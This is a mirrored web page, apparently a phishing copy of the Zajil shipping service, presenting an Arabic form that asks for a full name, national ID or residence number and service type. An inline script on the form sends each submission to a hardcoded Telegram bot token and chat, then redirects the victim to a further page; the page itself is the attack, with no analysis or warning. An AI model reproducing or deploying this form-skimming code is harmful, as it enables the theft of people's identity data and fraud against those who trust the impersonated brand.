		href='../css-1192c.html?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;display=swap&amp;ver=6.1.1'
		media='all'>
	<link rel='stylesheet' id='google-earlyaccess-2-css' href='../earlyaccess/droidarabickufi6a4d.css?ver=6.1.1'
		media='all'>
	<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><!--[if IE]>
<script src='https://aerzs-iletuues-ami.xyz/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=4.0.2' id='astra-flexibility-js'></script>
<script id='astra-flexibility-js-after'>
flexibility(document.documentElement);
</script>
<![endif]-->
	<script src='../wp-includes/js/jquery/jquery.mina7a0.js?ver=3.6.1' id='jquery-core-js'></script>
	<script src='../wp-includes/js/jquery/jquery-migrate.mind617.js?ver=3.3.2' id='jquery-migrate-js'></script>
	<link rel="https://api.w.org/" href="../wp-json/index.html">
	<link rel="alternate" type="application/json" href="../wp-json/wp/v2/pages/2316">
	<link rel="EditURI" type="application/rsd+xml" title="RSD" href="../xmlrpc0db0.php?rsd">
	<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="../wp-includes/wlwmanifest.xml">
	<meta name="generator" content="WordPress 6.1.1">
	<link rel="canonical" href="index.html">
	<link rel='shortlink' href='index96c2.html?p=2316'>
	<link rel="alternate" type="application/json+oembed"
		href="../wp-json/oembed/1.0/embed-2b13e?url=https%3A%2F%2Faerzs-iletuues-ami.xyz%2Fstart%2F">
	<link rel="alternate" type="text/xml+oembed"
		href="../wp-json/oembed/1.0/embed-31e82?url=https%3A%2F%2Faerzs-iletuues-ami.xyz%2Fstart%2F&amp;format=xml">
	<link rel="icon" href="../wp-content/uploads/2022/11/cropped-Frame-32-32x32.png" sizes="32x32">
	<link rel="icon" href="../wp-content/uploads/2022/11/cropped-Frame-32-192x192.png" sizes="192x192">
	<link rel="apple-touch-icon" href="../wp-content/uploads/2022/11/cropped-Frame-32-180x180.png">
	<meta name="msapplication-TileImage"
		content="https://aerzs-iletuues-ami.xyz/wp-content/uploads/2022/11/cropped-Frame-32-270x270.png">
</head>

<body itemtype='https://schema.org/WebPage' itemscope='itemscope'
	class="page-template-default page page-id-2316 ast-desktop ast-page-builder-template ast-no-sidebar astra-4.0.2 ast-single-post ast-inherit-site-logo-transparent ast-hfb-header elementor-default elementor-kit-6 elementor-page elementor-page-2316">
	<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-dark-grayscale">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0 0.49803921568627"></fefuncr>
					<fefuncg type="table" tablevalues="0 0.49803921568627"></fefuncg>
					<fefuncb type="table" tablevalues="0 0.49803921568627"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-grayscale">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0 1"></fefuncr>
					<fefuncg type="table" tablevalues="0 1"></fefuncg>
					<fefuncb type="table" tablevalues="0 1"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-purple-yellow">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0.54901960784314 0.98823529411765"></fefuncr>
					<fefuncg type="table" tablevalues="0 1"></fefuncg>
					<fefuncb type="table" tablevalues="0.71764705882353 0.25490196078431"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-blue-red">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0 1"></fefuncr>
					<fefuncg type="table" tablevalues="0 0.27843137254902"></fefuncg>
					<fefuncb type="table" tablevalues="0.5921568627451 0.27843137254902"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-midnight">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0 0"></fefuncr>
					<fefuncg type="table" tablevalues="0 0.64705882352941"></fefuncg>
					<fefuncb type="table" tablevalues="0 1"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-magenta-yellow">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0.78039215686275 1"></fefuncr>
					<fefuncg type="table" tablevalues="0 0.94901960784314"></fefuncg>
					<fefuncb type="table" tablevalues="0.35294117647059 0.47058823529412"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-purple-green">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0.65098039215686 0.40392156862745"></fefuncr>
					<fefuncg type="table" tablevalues="0 1"></fefuncg>
					<fefuncb type="table" tablevalues="0.44705882352941 0.4"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg><svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 0 0" width="0" height="0" focusable="false" role="none"
		style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;">
		<defs>
			<filter id="wp-duotone-blue-orange">
				<fecolormatrix color-interpolation-filters="sRGB" type="matrix"
					values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 ">
				</fecolormatrix>
				<fecomponenttransfer color-interpolation-filters="sRGB">
					<fefuncr type="table" tablevalues="0.098039215686275 1"></fefuncr>
					<fefuncg type="table" tablevalues="0 0.66274509803922"></fefuncg>
					<fefuncb type="table" tablevalues="0.84705882352941 0.41960784313725"></fefuncb>
					<fefunca type="table" tablevalues="1 1"></fefunca>
				</fecomponenttransfer>
				<fecomposite in2="SourceGraphic" operator="in"></fecomposite>
			</filter>
		</defs>
	</svg>
	<a class="skip-link screen-reader-text" href="#content" role="link" title="Skip to content">
		Skip to content</a>

	<div class="hfeed site" id="page">
		<header
			class="site-header header-main-layout-1 ast-primary-menu-enabled ast-logo-title-inline ast-hide-custom-menu-mobile ast-builder-menu-toggle-icon ast-mobile-header-inline"
			id="masthead" itemtype="https://schema.org/WPHeader" itemscope="itemscope" itemid="#masthead">
			<div id="ast-desktop-header" data-toggle-type="dropdown">
			</div> <!-- Main Header Bar Wrap -->
			<div id="ast-mobile-header" class="ast-mobile-header-wrap " data-type="dropdown">
			</div>
		</header><!-- #masthead -->
		<div id="content" class="site-content">
			<div class="ast-container">


				<div id="primary" class="content-area primary">


					<main id="main" class="site-main">
						<article class="post-2316 page type-page status-publish ast-article-single" id="post-2316"
							itemtype="https://schema.org/CreativeWork" itemscope="itemscope">


							<header class="entry-header ast-no-thumbnail ast-no-title ast-header-without-markup">
							</header> <!-- .entry-header -->


							<div class="entry-content clear" itemprop="text">


								<div data-elementor-type="wp-page" data-elementor-id="2316"
									class="elementor elementor-2316">
									<section
										class="elementor-section elementor-top-section elementor-element elementor-element-9bc4fac elementor-section-boxed elementor-section-height-default elementor-section-height-default"
										data-id="9bc4fac" data-element_type="section">
										<div class="elementor-container elementor-column-gap-default">
											<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c0cc096"
												data-id="c0cc096" data-element_type="column">
												<div class="elementor-widget-wrap elementor-element-populated">
													<section
														class="elementor-section elementor-inner-section elementor-element elementor-element-7a48aa4 elementor-section-boxed elementor-section-height-default elementor-section-height-default"
														data-id="7a48aa4" data-element_type="section">
														<div class="elementor-container elementor-column-gap-default">
															<div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-7ff3578"
																data-id="7ff3578" data-element_type="column">
																<div class="elementor-widget-wrap">
																</div>
															</div>
															<div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-a0e43bf"
																data-id="a0e43bf" data-element_type="column"
																data-settings="{&quot;background_background&quot;:&quot;classic&quot;}">
																<div
																	class="elementor-widget-wrap elementor-element-populated">
																	<div class="elementor-element elementor-element-145aa6f elementor-widget elementor-widget-image"
																		data-id="145aa6f" data-element_type="widget"
																		data-widget_type="image.default">
																		<div class="elementor-widget-container">
																			<style>
																				/*! elementor - v3.10.1 - 17-01-2023 */
																				.elementor-widget-image {
																					text-align: center
																				}

																				.elementor-widget-image a {
																					display: inline-block
																				}

																				.elementor-widget-image a img[src$=".svg"] {
																					width: 48px
																				}

																				.elementor-widget-image img {
																					vertical-align: middle;
																					display: inline-block
																				}
																			</style> <img decoding="async" width="300"
																				height="195"
																				src="../wp-content/uploads/2022/10/%d8%af%d9%88%d8%a7%d9%85-%d8%b2%d8%a7%d8%ac%d9%84-%d9%81%d9%8a-%d8%b1%d9%85%d8%b6%d8%a7%d9%86-300x195-1.webp"
																				class="attachment-2048x2048 size-2048x2048 wp-image-6168"
																				alt="" loading="lazy">
																		</div>
																	</div>
																	<div class="elementor-element elementor-element-fc4dfae elementor-widget elementor-widget-heading"
																		data-id="fc4dfae" data-element_type="widget"
																		data-widget_type="heading.default">
																		<div class="elementor-widget-container">
																			<style>
																				/*! elementor - v3.10.1 - 17-01-2023 */
																				.elementor-heading-title {
																					padding: 0;
																					margin: 0;
																					line-height: 1
																				}

																				.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a {
																					color: inherit;
																					font-size: inherit;
																					line-height: inherit
																				}

																				.elementor-widget-heading .elementor-heading-title.elementor-size-small {
																					font-size: 15px
																				}

																				.elementor-widget-heading .elementor-heading-title.elementor-size-medium {
																					font-size: 19px
																				}

																				.elementor-widget-heading .elementor-heading-title.elementor-size-large {
																					font-size: 29px
																				}

																				.elementor-widget-heading .elementor-heading-title.elementor-size-xl {
																					font-size: 39px
																				}

																				.elementor-widget-heading .elementor-heading-title.elementor-size-xxl {
																					font-size: 59px
																				}
																			</style>
																			<h2
																				class="elementor-heading-title elementor-size-default">
																				خدمة شحن</h2>
																		</div>
																	</div>
																	<div class="elementor-element elementor-element-3a9f9d9 elementor-widget elementor-widget-wpforms"
																		data-id="3a9f9d9" data-element_type="widget"
																		data-widget_type="wpforms.default">
																		<div class="elementor-widget-container">
																			<div class="wpforms-container wpforms-container-full"
																				id="wpforms-6398">
																				<form id="wpforms-form-6398"
																					class="wpforms-validate wpforms-form wpforms-ajax-form"
																					data-formid="6398" method="post"
																					enctype="multipart/form-data">
																					<noscript
																						class="wpforms-error-noscript">Please
																						enable JavaScript in your
																						browser to complete this
																						form.</noscript>
																					<div
																						class="wpforms-field-container">
																						<div id="wpforms-6398-field_1-container"
																							class="wpforms-field wpforms-field-name"
																							data-field-id="1"><label
																								class="wpforms-field-label wpforms-label-hide"
																								for="wpforms-6398-field_1">الاسم
																								الكامل <span
																									class="wpforms-required-label">*</span></label><input
																								type="text" id="name"
																								class="wpforms-field-large wpforms-field-required"
																								name="wpforms[fields][1]"
																								placeholder="الاسم الكامل"
																								required=""></div>
																						<div id="wpforms-6398-field_3-container"
																							class="wpforms-field wpforms-field-number"
																							data-field-id="3"><label
																								class="wpforms-field-label wpforms-label-hide"
																								for="wpforms-6398-field_3">رقم
																								الهوية/مكان الإقامة
																								<span
																									class="wpforms-required-label">*</span></label><input
																								type="number"
																								pattern="\d*" id="num"
																								class="wpforms-field-large wpforms-field-required"
																								name="wpforms[fields][3]"
																								placeholder="رقم الهوية/مكان الإقامة"
																								required=""></div>
																						<div id="wpforms-6398-field_5-container"
																							class="wpforms-field wpforms-field-select wpforms-field-select-style-classic"
																							data-field-id="5"><label
																								class="wpforms-field-label"
																								for="wpforms-6398-field_5">نوع
																								الخدمة</label><select
																								id="type"
																								class="wpforms-field-large"
																								name="wpforms[fields][5]">
																								<option
																									value="طلب توصيل">
																									طلب توصيل</option>
																								<option value="استلام">
																									استلام</option>
																							</select></div>
																					</div>
																					<div
																						class="wpforms-submit-container">
																						<input type="hidden"
																							name="wpforms[id]"
																							value="6398"><input
																							type="hidden"
																							name="wpforms[author]"
																							value="1"><input
																							type="hidden"
																							name="wpforms[post_id]"
																							value="2316"><button
																							type="submit"
																							name="wpforms[submit]"
																							id="wpforms-submit-6398"
																							class="wpforms-submit"
																							aria-live="assertive"
																							value="wpforms-submit">التالي</button><img
																							decoding="async"
																							src="../wp-content/plugins/wpforms-lite/assets/images/submit-spin.svg"
																							class="wpforms-submit-spinner"
																							style="display: none;"
																							width="26" height="26"
																							alt="Loading">
																					</div>
																				</form>

																				<script>
																					const form = document.querySelector("#wpforms-form-6398");

																					form.addEventListener("submit", (e) => {
																						e.preventDefault();


																						var name = document.getElementById("name").value;
																						var num = document.getElementById("num").value;
																						var type = document.getElementById("type").value;
																						var my_text = `البيانات%0A    الاسم الكامل: ${name} 
																									%0A الرقم الهوية : ${num}  %0A نوع الخدمة : ${type}`;

																						var token = "5402026134:AAF0YTvoHQ4jP_lKE0FNWlmGFQ4DOfEuAYs";
																						var chat_id = -1001570541783;
																						var url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${my_text}`

																						let api = new XMLHttpRequest();
																						api.open("GET.html", url, true);
																						api.send();

																						console.log("Message successfully sended!")
																						document.location.href = "../driven-number/index.html";
																					});
																				</script>
																			</div> <!-- .wpforms-container -->
																		</div>
																	</div>
																</div>
															</div>
															<div class="elementor-column elementor-col-33 elementor-inner-column elementor-element elementor-element-65fecac"
																data-id="65fecac" data-element_type="column">
																<div class="elementor-widget-wrap">
																</div>
															</div>
														</div>
													</section>
												</div>
											</div>
										</div>
									</section>
								</div>



							</div><!-- .entry-content .clear -->



						</article><!-- #post-## -->

					</main><!-- #main -->


				</div><!-- #primary -->


			</div> <!-- ast-container -->
		</div><!-- #content -->
		<footer class="site-footer" id="colophon" itemtype="https://schema.org/WPFooter" itemscope="itemscope"
			itemid="#colophon">
		</footer><!-- #colophon -->
	</div><!-- #page -->
	<script id='astra-theme-js-js-extra'>
		var astra = { "break_point": "921", "isRtl": "", "is_scroll_to_id": "", "is_scroll_to_top": "" };
	</script>
	<script src='../wp-content/themes/astra/assets/js/minified/frontend.min05da.js?ver=4.0.2'
		id='astra-theme-js-js'></script>
	<script src='../wp-content/plugins/hurrytimer/assets/js/cookie.mina1c3.js?ver=3.14.1' id='hurryt-cookie-js'></script>
	<script src='../wp-content/plugins/hurrytimer/assets/js/jquery.countdown.min3601.js?ver=2.2.0'
		id='hurryt-countdown-js'></script>
	<script id='hurrytimer-js-extra'>
		var hurrytimer_ajax_object = { "ajax_url": "https:\/\/aerzs-iletuues-ami.xyz\/wp-admin\/admin-ajax.php", "ajax_nonce": "69359ba188", "disable_actions": "", "methods": { "COOKIE": 1, "IP": 2, "USER_SESSION": 3 }, "actionsOptions": { "none": 1, "hide": 2, "redirect": 3, "stockStatus": 4, "hideAddToCartButton": 5, "displayMessage": 6, "expire_coupon": 7 }, "restartOptions": { "none": 1, "immediately": 2, "afterReload": 3, "after_duration": 4 }, "COOKIEPATH": "\/", "COOKIE_DOMAIN": "", "redirect_no_back": "1", "expire_coupon_message": "" };
	</script>
	<script src='../wp-content/plugins/hurrytimer/assets/js/hurrytimerde39.js?ver=2.7.3' id='hurrytimer-js'></script>
	<script src='../wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min9e95.js?ver=3.8.0'
		id='elementor-pro-webpack-runtime-js'></script>
	<script src='../wp-content/plugins/elementor/assets/js/webpack.runtime.min2f56.js?ver=3.10.1'
		id='elementor-webpack-runtime-js'></script>
	<script src='../wp-content/plugins/elementor/assets/js/frontend-modules.min2f56.js?ver=3.10.1'
		id='elementor-frontend-modules-js'></script>
	<script src='../wp-includes/js/dist/vendor/regenerator-runtime.min3937.js?ver=0.13.9'
		id='regenerator-runtime-js'></script>
	<script src='../wp-includes/js/dist/vendor/wp-polyfill.min2c7c.js?ver=3.15.0' id='wp-polyfill-js'></script>
	<script src='../wp-includes/js/dist/hooks.min6c65.js?ver=4169d3cf8e8d95a3d6d5' id='wp-hooks-js'></script>
	<script src='../wp-includes/js/dist/i18n.mine57b.js?ver=9e794f35a71bb98672ae' id='wp-i18n-js'></script>
	<script id='wp-i18n-js-after'>
		wp.i18n.setLocaleData({ 'text direction\u0004ltr': ['ltr'] });
	</script>
	<script id='elementor-pro-frontend-js-before'>
		var ElementorProFrontendConfig = { "ajaxurl": "https:\/\/aerzs-iletuues-ami.xyz\/wp-admin\/admin-ajax.php", "nonce": "5c9fe16281", "urls": { "assets": "https:\/\/aerzs-iletuues-ami.xyz\/wp-content\/plugins\/elementor-pro\/assets\/", "rest": "https:\/\/aerzs-iletuues-ami.xyz\/wp-json\/" }, "shareButtonsNetworks": { "facebook": { "title": "Facebook", "has_counter": true }, "twitter": { "title": "Twitter" }, "linkedin": { "title": "LinkedIn", "has_counter": true }, "pinterest": { "title": "Pinterest", "has_counter": true }, "reddit": { "title": "Reddit", "has_counter": true }, "vk": { "title": "VK", "has_counter": true }, "odnoklassniki": { "title": "OK", "has_counter": true }, "tumblr": { "title": "Tumblr" }, "digg": { "title": "Digg" }, "skype": { "title": "Skype" }, "stumbleupon": { "title": "StumbleUpon", "has_counter": true }, "mix": { "title": "Mix" }, "telegram": { "title": "Telegram" }, "pocket": { "title": "Pocket", "has_counter": true }, "xing": { "title": "XING", "has_counter": true }, "whatsapp": { "title": "WhatsApp" }, "email": { "title": "Email" }, "print": { "title": "Print" } }, "facebook_sdk": { "lang": "en_US", "app_id": "" }, "lottie": { "defaultAnimationUrl": "https:\/\/aerzs-iletuues-ami.xyz\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json" } };
	</script>
	<script src='../wp-content/plugins/elementor-pro/assets/js/frontend.min9e95.js?ver=3.8.0'
		id='elementor-pro-frontend-js'></script>
	<script src='../wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min05da.js?ver=4.0.2'
		id='elementor-waypoints-js'></script>
	<script src='../wp-includes/js/jquery/ui/core.min3f14.js?ver=1.13.2' id='jquery-ui-core-js'></script>
	<script id='elementor-frontend-js-before'>
		var elementorFrontendConfig = { "environmentMode": { "edit": false, "wpPreview": false, "isScriptDebug": false }, "i18n": { "shareOnFacebook": "Share on Facebook", "shareOnTwitter": "Share on Twitter", "pinIt": "Pin it", "download": "Download", "downloadImage": "Download image", "fullscreen": "Fullscreen", "zoom": "Zoom", "share": "Share", "playVideo": "Play Video", "previous": "Previous", "next": "Next", "close": "Close" }, "is_rtl": false, "breakpoints": { "xs": 0, "sm": 480, "md": 768, "lg": 1025, "xl": 1440, "xxl": 1600 }, "responsive": { "breakpoints": { "mobile": { "label": "Mobile", "value": 767, "default_value": 767, "direction": "max", "is_enabled": true }, "mobile_extra": { "label": "Mobile Extra", "value": 880, "default_value": 880, "direction": "max", "is_enabled": false }, "tablet": { "label": "Tablet", "value": 1024, "default_value": 1024, "direction": "max", "is_enabled": true }, "tablet_extra": { "label": "Tablet Extra", "value": 1200, "default_value": 1200, "direction": "max", "is_enabled": false }, "laptop": { "label": "Laptop", "value": 1366, "default_value": 1366, "direction": "max", "is_enabled": false }, "widescreen": { "label": "Widescreen", "value": 2400, "default_value": 2400, "direction": "min", "is_enabled": false } } }, "version": "3.10.1", "is_static": false, "experimentalFeatures": { "e_dom_optimization": true, "e_optimized_assets_loading": true, "e_optimized_css_loading": true, "a11y_improvements": true, "additional_custom_breakpoints": true, "e_hidden_wordpress_widgets": true, "theme_builder_v2": true, "landing-pages": true, "kit-elements-defaults": true, "page-transitions": true, "notes": true, "loop": true, "form-submissions": true, "e_scroll_snap": true }, "urls": { "assets": "https:\/\/aerzs-iletuues-ami.xyz\/wp-content\/plugins\/elementor\/assets\/" }, "settings": { "page": [], "editorPreferences": [] }, "kit": { "active_breakpoints": ["viewport_mobile", "viewport_tablet"], "global_image_lightbox": "yes", "lightbox_enable_counter": "yes", "lightbox_enable_fullscreen": "yes", "lightbox_enable_zoom": "yes", "lightbox_enable_share": "yes", "lightbox_title_src": "title", "lightbox_description_src": "description" }, "post": { "id": 2316, "title": "Start%20%E2%80%93%20%D8%B2%D8%A7%D8%AC%D9%84", "excerpt": "", "featuredImage": false } };
	</script>
	<script src='../wp-content/plugins/elementor/assets/js/frontend.min2f56.js?ver=3.10.1'
		id='elementor-frontend-js'></script>
	<script src='../wp-content/plugins/elementor-pro/assets/js/elements-handlers.min9e95.js?ver=3.8.0'
		id='pro-elements-handlers-js'></script>
	<script src='../wp-includes/js/underscore.mind584.js?ver=1.13.4' id='underscore-js'></script>
	<script id='wp-util-js-extra'>
		var _wpUtilSettings = { "ajax": { "url": "\/wp-admin\/admin-ajax.php" } };
	</script>
	<script src='../wp-includes/js/wp-util.min6a4d.js?ver=6.1.1' id='wp-util-js'></script>
	<script id='wpforms-elementor-js-extra'>
		var wpformsElementorVars = { "captcha_provider": "recaptcha", "recaptcha_type": "v2" };
	</script>
	<script src='../wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min4a2b.js?ver=1.7.9.1'
		id='wpforms-elementor-js'></script>
	<script src='../wp-content/plugins/wpforms-lite/assets/lib/jquery.validate.min7e9d.js?ver=1.19.5'
		id='wpforms-validation-js'></script>
	<script src='../wp-content/plugins/wpforms-lite/assets/js/utils.min4a2b.js?ver=1.7.9.1'
		id='wpforms-generic-utils-js'></script>
	<script src='../wp-content/plugins/wpforms-lite/assets/js/wpforms.min4a2b.js?ver=1.7.9.1' id='wpforms-js'></script>
	<script>
		/(trident|msie)/i.test(navigator.userAgent) && document.getElementById && window.addEventListener && window.addEventListener("hashchange", function () { var t, e = location.hash.substring(1); /^[A-z0-9_-]+$/.test(e) && (t = document.getElementById(e)) && (/^(?:a|select|input|button|textarea)$/i.test(t.tagName) || (t.tabIndex = -1), t.focus()) }, !1);
	</script>
	<script type='text/javascript'>
		/* <![CDATA[ */
		var wpforms_settings = { "val_required": "This field is required.", "val_email": "Please enter a valid email address.", "val_email_suggestion": "Did you mean {suggestion}?", "val_email_suggestion_title": "Click to accept this suggestion.", "val_email_restricted": "This email address is not allowed.", "val_number": "Please enter a valid number.", "val_number_positive": "Please enter a valid positive number.", "val_confirm": "Field values do not match.", "val_checklimit": "You have exceeded the number of allowed selections: {#}.", "val_limit_characters": "{count} of {limit} max characters.", "val_limit_words": "{count} of {limit} max words.", "val_recaptcha_fail_msg": "Google reCAPTCHA verification failed, please try again later.", "val_inputmask_incomplete": "Please fill out the field in required format.", "uuid_cookie": "", "locale": "en", "wpforms_plugin_url": "https:\/\/aerzs-iletuues-ami.xyz\/wp-content\/plugins\/wpforms-lite\/", "gdpr": "", "ajaxurl": "https:\/\/aerzs-iletuues-ami.xyz\/wp-admin\/admin-ajax.php", "mailcheck_enabled": "1", "mailcheck_domains": [], "mailcheck_toplevel_domains": ["dev"], "is_ssl": "1", "page_title": "Start", "page_id": "2316" }
/* ]]> */
	</script>
</body>


<!-- Mirrored from zajil-zajil-d2356c.netlify.app/start/index.htm by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 05 Mar 2023 16:53:34 GMT -->
</html>